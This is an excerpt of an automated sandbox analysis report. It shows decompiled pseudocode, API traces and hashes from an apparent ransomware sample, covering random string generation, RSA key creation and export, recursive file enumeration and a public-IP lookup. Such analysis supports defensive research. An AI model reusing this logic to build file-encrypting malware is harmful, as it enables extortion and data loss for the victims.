                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
                                      • String ID: $7@$$7@$Microsoft Enhanced Cryptographic Provider v1.0
                                      • API String ID: 72144047-2376705498
                                      • Opcode ID: 8206897a1cfa35837b8722e43d42d1a1e9784adc6c633a5bd71464a07145b1f5
                                      • Instruction ID: f2ae4c90db2c5b8a25dd032e9c4ad046e7fd1e3aad681ca681e37570fcd3149a
                                      • Opcode Fuzzy Hash: 8206897a1cfa35837b8722e43d42d1a1e9784adc6c633a5bd71464a07145b1f5
                                      • Instruction Fuzzy Hash: 84314F74A40308BFDB10CFA0DD45FAF77B8AB48700F108029F602BA2D0D7B99A50DB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 66%
                                      			E00407C60(intOrPtr __ecx, void* __edx) {
                                      				long* _v8;
                                      				intOrPtr _v12;
                                      				signed int _v16;
                                      				char _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				char _v32;
                                      				char _v34;
                                      				short _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				char _v48;
                                      				long** _t37;
                                      				struct HINSTANCE__* _t45;
                                      				_Unknown_base(*)()* _t46;
                                      				signed int _t54;
                                      				long _t55;
                                      				intOrPtr _t56;
                                      				signed int _t58;
                                      				signed int _t60;
                                      				void* _t63;
                                      				void* _t64;
                                      				void* _t65;
                                      
                                      				_t54 = 0;
                                      				_v12 = __ecx;
                                      				_t37 =  &_v8;
                                      				_t63 = __edx;
                                      				__imp__CryptAcquireContextW(_t37, 0, 0, 1, 0xf0000000);
                                      				if(_t37 == 0) {
                                      					L15:
                                      					return _t54;
                                      				} else {
                                      					_t58 = 0;
                                      					do {
                                      						_t3 = _t58 + 0x61; // 0x61
                                      						 *((short*)(_t65 + _t58 * 2 - 0x64)) = _t3;
                                      						_t58 = _t58 + 1;
                                      					} while (_t58 < 0x1a);
                                      					_t7 = _t63 + 1; // 0x1
                                      					_t55 = _t7;
                                      					_t64 = VirtualAlloc(0, _t55, 0x3000, 0x40);
                                      					if(_t64 == 0 || _t63 >= _t55) {
                                      						CryptReleaseContext(_v8, 0);
                                      						VirtualFree(_t64, 0, 0x8000);
                                      						return 0;
                                      					} else {
                                      						_v48 = 0x70797243;
                                      						_v44 = 0x6e654774;
                                      						_v40 = 0x646e6152;
                                      						_v36 = 0x6d6f;
                                      						_v34 = 0;
                                      						_v32 = 0x61766441;
                                      						_v28 = 0x32336970;
                                      						_v24 = 0x6c6c642e;
                                      						_v20 = 0;
                                      						_t45 = GetModuleHandleA( &_v32);
                                      						if(_t45 != 0) {
                                      							L7:
                                      							_t19 =  &_v48; // 0x70797243
                                      							_t46 = GetProcAddress(_t45, _t19);
                                      							if(_t46 == 0) {
                                      								goto L13;
                                      							} else {
                                      								_push(_t64);
                                      								_push(_t63);
                                      								_push(_v8);
                                      								if( *_t46() == 0) {
                                      									goto L13;
                                      								} else {
                                      									_t60 = 0;
                                      									if(_t63 != 0) {
                                      										_t56 = _v12;
                                      										_v16 = 0x1a;
                                      										do {
                                      											asm("cdq");
                                      											 *((short*)(_t56 + _t60 * 2)) =  *((intOrPtr*)(_t65 + ( *(_t64 + _t60) & 0x000000ff) % _v16 * 2 - 0x64));
                                      											_t60 = _t60 + 1;
                                      										} while (_t60 < _t63);
                                      									}
                                      									_t54 = 1;
                                      								}
                                      							}
                                      						} else {
                                      							_t18 =  &_v32; // 0x61766441
                                      							_t45 = LoadLibraryA(_t18);
                                      							if(_t45 == 0) {
                                      								L13:
                                      								_t54 = 0;
                                      							} else {
                                      								goto L7;
                                      							}
                                      						}
                                      						CryptReleaseContext(_v8, 0);
                                      						VirtualFree(_t64, 0, 0x8000);
                                      						goto L15;
                                      					}
                                      				}
                                      			}


























                                      0x00407c70
                                      0x00407c72
                                      0x00407c77
                                      0x00407c7a
                                      0x00407c7d
                                      0x00407c85
                                      0x00407d79
                                      0x00407d81
                                      0x00407c8b
                                      0x00407c8b
                                      0x00407c90
                                      0x00407c90
                                      0x00407c93
                                      0x00407c98
                                      0x00407c99
                                      0x00407ca5
                                      0x00407ca5
                                      0x00407cb1
                                      0x00407cb5
                                      0x00407d87
                                      0x00407d95
                                      0x00407da3
                                      0x00407cc3
                                      0x00407cc6
                                      0x00407cce
                                      0x00407cd5
                                      0x00407cdc
                                      0x00407ce2
                                      0x00407ce6
                                      0x00407ced
                                      0x00407cf4
                                      0x00407cfb
                                      0x00407cff
                                      0x00407d07
                                      0x00407d17
                                      0x00407d17
                                      0x00407d1c
                                      0x00407d24
                                      0x00000000
                                      0x00407d26
                                      0x00407d26
                                      0x00407d27
                                      0x00407d28
                                      0x00407d2f
                                      0x00000000
                                      0x00407d31
                                      0x00407d31
                                      0x00407d35
                                      0x00407d37
                                      0x00407d3a
                                      0x00407d41
                                      0x00407d45
                                      0x00407d4e
                                      0x00407d52
                                      0x00407d53
                                      0x00407d41
                                      0x00407d57
                                      0x00407d57
                                      0x00407d2f
                                      0x00407d09
                                      0x00407d09
                                      0x00407d0d
                                      0x00407d15
                                      0x00407d5e
                                      0x00407d5e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00407d15
                                      0x00407d65
                                      0x00407d73
                                      0x00000000
                                      0x00407d73
                                      0x00407cb5

                                      APIs
                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00407C7D
                                      • VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00407CAB
                                      • GetModuleHandleA.KERNEL32(?), ref: 00407CFF
                                      • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407D0D
                                      • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407D1C
                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D65
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407D73
                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407D87
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407D95
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                      • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                      • API String ID: 3996966626-2152921537
                                      • Opcode ID: 0458a47c7d0f6a737997e540b1eda647f42b02ba3f55a885d4cf6adcdbbaa127
                                      • Instruction ID: 199b4cbb89f92d6933ab86ad2097cfc69592b150d2405189e4f4276a6cc67689
                                      • Opcode Fuzzy Hash: 0458a47c7d0f6a737997e540b1eda647f42b02ba3f55a885d4cf6adcdbbaa127
                                      • Instruction Fuzzy Hash: 8931F871E04209ABEB109FE4DD49BEEBB78EF44700F204079E505B62A1E775AE01CB6D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 75%
                                      			E00407DB0(intOrPtr __ecx, intOrPtr __edx) {
                                      				long* _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				char _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				char _v32;
                                      				char _v34;
                                      				short _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				char _v48;
                                      				long** _t25;
                                      				struct HINSTANCE__* _t33;
                                      				_Unknown_base(*)()* _t34;
                                      				long _t40;
                                      				void* _t42;
                                      				void* _t46;
                                      				void* _t47;
                                      				void* _t48;
                                      
                                      				_t46 = 0;
                                      				_v16 = __ecx;
                                      				_t25 =  &_v8;
                                      				_v12 = __edx;
                                      				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000);
                                      				if(_t25 == 0) {
                                      					L10:
                                      					return _t46;
                                      				} else {
                                      					_t42 = 0;
                                      					do {
                                      						_t4 = _t42 + 0x61; // 0x61
                                      						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
                                      						_t42 = _t42 + 1;
                                      					} while (_t42 < 0x1a);
                                      					_t40 = __edx + 1;
                                      					_t47 = VirtualAlloc(0, _t40, 0x3000, 0x40);
                                      					if(_t47 == 0 || _v12 >= _t40) {
                                      						CryptReleaseContext(_v8, 0);
                                      						VirtualFree(_t47, 0, 0x8000);
                                      						return 0;
                                      					} else {
                                      						_v48 = 0x70797243;
                                      						_v44 = 0x6e654774;
                                      						_v40 = 0x646e6152;
                                      						_v36 = 0x6d6f;
                                      						_v34 = 0;
                                      						_v32 = 0x61766441;
                                      						_v28 = 0x32336970;
                                      						_v24 = 0x6c6c642e;
                                      						_v20 = 0;
                                      						_t33 = GetModuleHandleA( &_v32);
                                      						if(_t33 != 0) {
                                      							L7:
                                      							_t19 =  &_v48; // 0x70797243
                                      							_t34 = GetProcAddress(_t33, _t19);
                                      							if(_t34 != 0) {
                                      								 *_t34(_v8, _v12, _v16);
                                      								_t46 =  !=  ? 1 : _t46;
                                      							}
                                      						} else {
                                      							_t18 =  &_v32; // 0x61766441
                                      							_t33 = LoadLibraryA(_t18);
                                      							if(_t33 != 0) {
                                      								goto L7;
                                      							}
                                      						}
                                      						CryptReleaseContext(_v8, 0);
                                      						VirtualFree(_t47, 0, 0x8000);
                                      						goto L10;
                                      					}
                                      				}
                                      			}























                                      0x00407dc0
                                      0x00407dc2
                                      0x00407dc7
                                      0x00407dcd
                                      0x00407dd0
                                      0x00407dd8
                                      0x00407ea2
                                      0x00407eaa
                                      0x00407dde
                                      0x00407dde
                                      0x00407de0
                                      0x00407de0
                                      0x00407de3
                                      0x00407de7
                                      0x00407de8
                                      0x00407df4
                                      0x00407dfe
                                      0x00407e02
                                      0x00407eb0
                                      0x00407ebe
                                      0x00407ecc
                                      0x00407e11
                                      0x00407e14
                                      0x00407e1c
                                      0x00407e23
                                      0x00407e2a
                                      0x00407e30
                                      0x00407e34
                                      0x00407e3b
                                      0x00407e42
                                      0x00407e49
                                      0x00407e4d
                                      0x00407e55
                                      0x00407e65
                                      0x00407e65
                                      0x00407e6a
                                      0x00407e72
                                      0x00407e7d
                                      0x00407e86
                                      0x00407e86
                                      0x00407e57
                                      0x00407e57
                                      0x00407e5b
                                      0x00407e63
                                      0x00000000
                                      0x00000000
                                      0x00407e63
                                      0x00407e8e
                                      0x00407e9c
                                      0x00000000
                                      0x00407e9c
                                      0x00407e02

                                      APIs
                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,74CB66A0,00000000), ref: 00407DD0
                                      • VirtualAlloc.KERNEL32(00000000,00000011,00003000,00000040), ref: 00407DF8
                                      • GetModuleHandleA.KERNEL32(?), ref: 00407E4D
                                      • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00407E5B
                                      • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00407E6A
                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00407E8E
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00407E9C
                                      • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EB0
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,004036A5), ref: 00407EBE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                      • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                      • API String ID: 3996966626-2152921537
                                      • Opcode ID: ecf7433da154a3d3e4de08d5f3ff40864c9027ea2fbed6340348b44d82ee8ddf
                                      • Instruction ID: be5cfa20fe97609e74d06931db444e7d7e20eeaeedb8336480d1c404223e93be
                                      • Opcode Fuzzy Hash: ecf7433da154a3d3e4de08d5f3ff40864c9027ea2fbed6340348b44d82ee8ddf
                                      • Instruction Fuzzy Hash: FA318471E05209AFEB109FA5DD49BEEBB78EF44701F104079E605B6291D774AE00CB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 16%
                                      			E00405D80(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                      				long* _v8;
                                      				long* _v12;
                                      				int _v16;
                                      				long** _t15;
                                      				long* _t16;
                                      				long _t23;
                                      
                                      				_t15 =  &_v8;
                                      				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
                                      				if(_t15 != 0) {
                                      					L6:
                                      					_t16 = _v8;
                                      					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12);
                                      					if(_t16 == 0) {
                                      					}
                                      					_v16 = 0;
                                      					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
                                      					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16);
                                      					CryptDestroyKey(_v12);
                                      					CryptReleaseContext(_v8, 0);
                                      					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10);
                                      					return 1;
                                      				}
                                      				_t23 = GetLastError();
                                      				if(_t23 != 0x80090016) {
                                      					return 0;
                                      				}
                                      				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                      				if(_t23 != 0) {
                                      					goto L6;
                                      				}
                                      				return 0;
                                      			}









                                      0x00405d91
                                      0x00405d95
                                      0x00405d9d
                                      0x00405dd5
                                      0x00405de3
                                      0x00405de7
                                      0x00405def
                                      0x00405def
                                      0x00405df2
                                      0x00405e0b
                                      0x00405e23
                                      0x00405e2d
                                      0x00405e39
                                      0x00405e4e
                                      0x00000000
                                      0x00405e54
                                      0x00405d9f
                                      0x00405daa
                                      0x00000000
                                      0x00405dce
                                      0x00405dbb
                                      0x00405dc3
                                      0x00000000
                                      0x00405dcc
                                      0x00000000

                                      APIs
                                      • CryptAcquireContextW.ADVAPI32(0040491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,00404916,?,0040491E), ref: 00405D95
                                      • GetLastError.KERNEL32(?,0040491E), ref: 00405D9F
                                      • CryptAcquireContextW.ADVAPI32(0040491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0040491E), ref: 00405DBB
                                      • CryptGenKey.ADVAPI32(0040491E,0000A400,08000001,?,?,0040491E), ref: 00405DE7
                                      • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 00405E0B
                                      • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 00405E23
                                      • CryptDestroyKey.ADVAPI32(?), ref: 00405E2D
                                      • CryptReleaseContext.ADVAPI32(0040491E,00000000), ref: 00405E39
                                      • CryptAcquireContextW.ADVAPI32(0040491E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 00405E4E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
                                      • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                      • API String ID: 137402220-1948191093
                                      • Opcode ID: 4ea6af53a05bc539ebf2c4aac83e9110a57bf35b6da581c5ea0214b087b6d0db
                                      • Instruction ID: a5e1c5bc4adb18f4c6cf36d0885f5ae2a65a9070c6c01f648420f3db759758e1
                                      • Opcode Fuzzy Hash: 4ea6af53a05bc539ebf2c4aac83e9110a57bf35b6da581c5ea0214b087b6d0db
                                      • Instruction Fuzzy Hash: FD216A75790308BBEB20CBA0DE4AF9B7779AB88B01F104425F701BA1D0C6B99940DB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 004077F0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004079D4
                                        • Part of subcall function 004077F0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 004079ED
                                      • VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,74CB66A0,?), ref: 0040690F
                                      • lstrlenW.KERNEL32(004103AC), ref: 0040691C
                                        • Part of subcall function 00407A00: InternetCloseHandle.WININET(?), ref: 00407A13
                                        • Part of subcall function 00407A00: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00407A32
                                      • lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,004103B0,00000000,00000000,00000000,000027FF,?,00000000), ref: 0040694B
                                      • wsprintfW.USER32 ref: 00406963
                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,004103B0,00000000,00000000,00000000,000027FF,?,00000000), ref: 00406979
                                      • InternetCloseHandle.WININET(?), ref: 00406987
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
                                      • String ID: GET$ipv4bot.whatismyipaddress.com
                                      • API String ID: 4289327240-2259699238
                                      • Opcode ID: f6e984b446ea9cd393b48de9e600680bd352efed8e23861790de7f30075ba64f
                                      • Instruction ID: 036ff581c335500f2984d10930e2f34b8e696fb6c4e233a2217fb5cd2a6ee9c0
                                      • Opcode Fuzzy Hash: f6e984b446ea9cd393b48de9e600680bd352efed8e23861790de7f30075ba64f
                                      • Instruction Fuzzy Hash: 6201B13574020577EB206B729E4EF9F3A38AB85B11F140036FA05F61C1DEB89959C6AD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 97%
                                      			E004066F0(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
                                      				void* _v12;
                                      				intOrPtr _v16;
                                      				WCHAR* _v20;
                                      				intOrPtr _v24;
                                      				struct _WIN32_FIND_DATAW _v616;
                                      				void* _t35;
                                      				signed int _t37;
                                      				int _t39;
                                      				signed int _t42;
                                      				void* _t46;
                                      				signed int* _t48;
                                      				WCHAR* _t53;
                                      				intOrPtr* _t54;
                                      				short _t57;
                                      				WCHAR* _t63;
                                      				void* _t67;
                                      
                                      				_v24 = __edx;
                                      				_t63 = __ecx;
                                      				"SVWj@h"();
                                      				if(__eax == 0 || E004064A0(__ecx) != 0) {
                                      					L17:
                                      					__eflags = 0;
                                      					return 0;
                                      				} else {
                                      					E00406640(__ecx);
                                      					_t53 =  &(_t63[lstrlenW(__ecx)]);
                                      					_v20 = _t53;
                                      					lstrcatW(_t63, "*");
                                      					_t35 = FindFirstFileW(_t63,  &_v616);
                                      					_t57 = 0;
                                      					_v12 = _t35;
                                      					 *_t53 = 0;
                                      					if(_t35 != 0xffffffff) {
                                      						_t54 = _a12;
                                      						do {
                                      							_t37 = lstrcmpW( &(_v616.cFileName), ".");
                                      							__eflags = _t37;
                                      							if(_t37 != 0) {
                                      								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
                                      								__eflags = _t42;
                                      								if(_t42 != 0) {
                                      									lstrcatW(_t63,  &(_v616.cFileName));
                                      									__eflags = _v616.dwFileAttributes & 0x00000010;
                                      									if((_v616.dwFileAttributes & 0x00000010) == 0) {
                                      										_v16 =  *_t54;
                                      										_t46 = E004063B0(_t63,  &_v616, _t57, _a4);
                                      										_t67 = _t67 + 8;
                                      										 *_t54 =  *_t54 + _t46;
                                      										asm("adc [ebx+0x4], edx");
                                      										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
                                      										if(__eflags <= 0) {
                                      											if(__eflags < 0) {
                                      												L12:
                                      												_t48 = _a8;
                                      												 *_t48 =  *_t48 + 1;
                                      												__eflags =  *_t48;
                                      											} else {
                                      												__eflags = _v16 -  *_t54;
                                      												if(_v16 <  *_t54) {
                                      													goto L12;
                                      												}
                                      											}
                                      										}
                                      									} else {
                                      										E004066F0(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
                                      										_t67 = _t67 + 0xc;
                                      									}
                                      									_t57 = 0;
                                      									__eflags = 0;
                                      									 *_v20 = 0;
                                      								}
                                      							}
                                      							_t39 = FindNextFileW(_v12,  &_v616);
                                      							__eflags = _t39;
                                      						} while (_t39 != 0);
                                      						FindClose(_v12);
                                      						goto L17;
                                      					} else {
                                      						return 0xdeadbeaf;
                                      					}
                                      				}
                                      			}



















                                      0x004066fc
                                      0x004066ff
                                      0x00406701
                                      0x00406708
                                      0x00406836
                                      0x00406836
                                      0x0040683c
                                      0x0040671d
                                      0x0040671d
                                      0x00406735
                                      0x00406738
                                      0x0040673b
                                      0x00406745
                                      0x0040674b
                                      0x0040674d
                                      0x00406750
                                      0x00406756
                                      0x00406764
                                      0x00406770
                                      0x0040677c
                                      0x00406782
                                      0x00406784
                                      0x00406796
                                      0x0040679c
                                      0x0040679e
                                      0x004067a8
                                      0x004067aa
                                      0x004067b1
                                      0x004067e2
                                      0x004067e5
                                      0x004067ea
                                      0x004067ed
                                      0x004067ef
                                      0x004067f2
                                      0x004067f5
                                      0x004067f7
                                      0x00406800
                                      0x00406800
                                      0x00406803
                                      0x00406803
                                      0x004067f9
                                      0x004067fc
                                      0x004067fe
                                      0x00000000
                                      0x00000000
                                      0x004067fe
                                      0x004067f7
                                      0x004067b3
                                      0x004067c7
                                      0x004067cc
                                      0x004067cc
                                      0x0040680e
                                      0x0040680e
                                      0x00406810
                                      0x00406810
                                      0x0040679e
                                      0x0040681d
                                      0x00406823
                                      0x00406823
                                      0x0040682e
                                      0x00000000
                                      0x00406758
                                      0x00406763
                                      0x00406763
                                      0x00406756

                                      APIs
                                        • Part of subcall function 00406110: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,00406706,00000000,?,?), ref: 00406123
                                        • Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,00406706,00000000,?,?), ref: 004061AE
                                        • Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,00406706,00000000,?,?), ref: 004061C8
                                        • Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,00406706,00000000,?,?), ref: 004061E2
                                        • Part of subcall function 00406110: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,00406706,00000000,?,?), ref: 004061FC
                                        • Part of subcall function 00406110: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00406706,00000000,?,?), ref: 0040621C
                                        • Part of subcall function 004064A0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 004064B2
                                        • Part of subcall function 004064A0: lstrcatW.KERNEL32(00000000,00410364), ref: 004064C4
                                        • Part of subcall function 004064A0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 004064D2
                                        • Part of subcall function 004064A0: lstrcmpW.KERNEL32(?,00410368,?,?), ref: 004064FC
                                        • Part of subcall function 004064A0: lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406512
                                        • Part of subcall function 004064A0: lstrcatW.KERNEL32(00000000,?), ref: 00406524
                                        • Part of subcall function 004064A0: lstrlenW.KERNEL32(00000000,?,?), ref: 0040652B
                                        • Part of subcall function 004064A0: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0040655A
                                        • Part of subcall function 004064A0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 00406571
                                        • Part of subcall function 004064A0: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0040657C
                                        • Part of subcall function 004064A0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0040659A
                                        • Part of subcall function 004064A0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 004065AF
                                        • Part of subcall function 00406640: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,00406722,00000000,?,?), ref: 00406655
                                        • Part of subcall function 00406640: wsprintfW.USER32 ref: 00406663
                                        • Part of subcall function 00406640: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0040667F
                                        • Part of subcall function 00406640: GetLastError.KERNEL32(?,?), ref: 0040668C
                                        • Part of subcall function 00406640: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 004066D8
                                      • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 00406723
                                      • lstrcatW.KERNEL32(00000000,00410364), ref: 0040673B
                                      • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00406745
                                      • lstrcmpW.KERNEL32(?,00410368,?,?), ref: 0040677C
                                      • lstrcmpW.KERNEL32(?,0041036C,?,?), ref: 00406796
                                      • lstrcatW.KERNEL32(00000000,?), ref: 004067A8
                                      • lstrcatW.KERNEL32(00000000,0041039C), ref: 004067B9
                                      • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0040681D
                                      • FindClose.KERNEL32(00003000,?,?), ref: 0040682E
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.295315372.0000000000402000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000D.00000002.295311869.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295321838.0000000000409000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295326787.000000000040E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295333499.0000000000412000.00000008.00000001.01000000.00000006.sdmpDownload File
                                      • Associated: 0000000D.00000002.295337067.0000000000414000.00000002.00000001.01000000.00000006.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_vkspii.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Virtuallstrcatlstrcmp$FindFolderPathSpecial$Alloclstrlen$CreateFirstFree$CloseErrorLastNextReadSizewsprintf
                                      • String ID:
                                      • API String ID: 1112924665-0
                                      • Opcode ID: eb068d23bd4874913e40b584eb86acccd6cc11bc9de15272c1017f03ccff3c16
                                      • Instruction ID: e664c09a6a9c308cb7d1e0fe319252d12530e52bee12665a8dc8c6cfb3a3f5dc
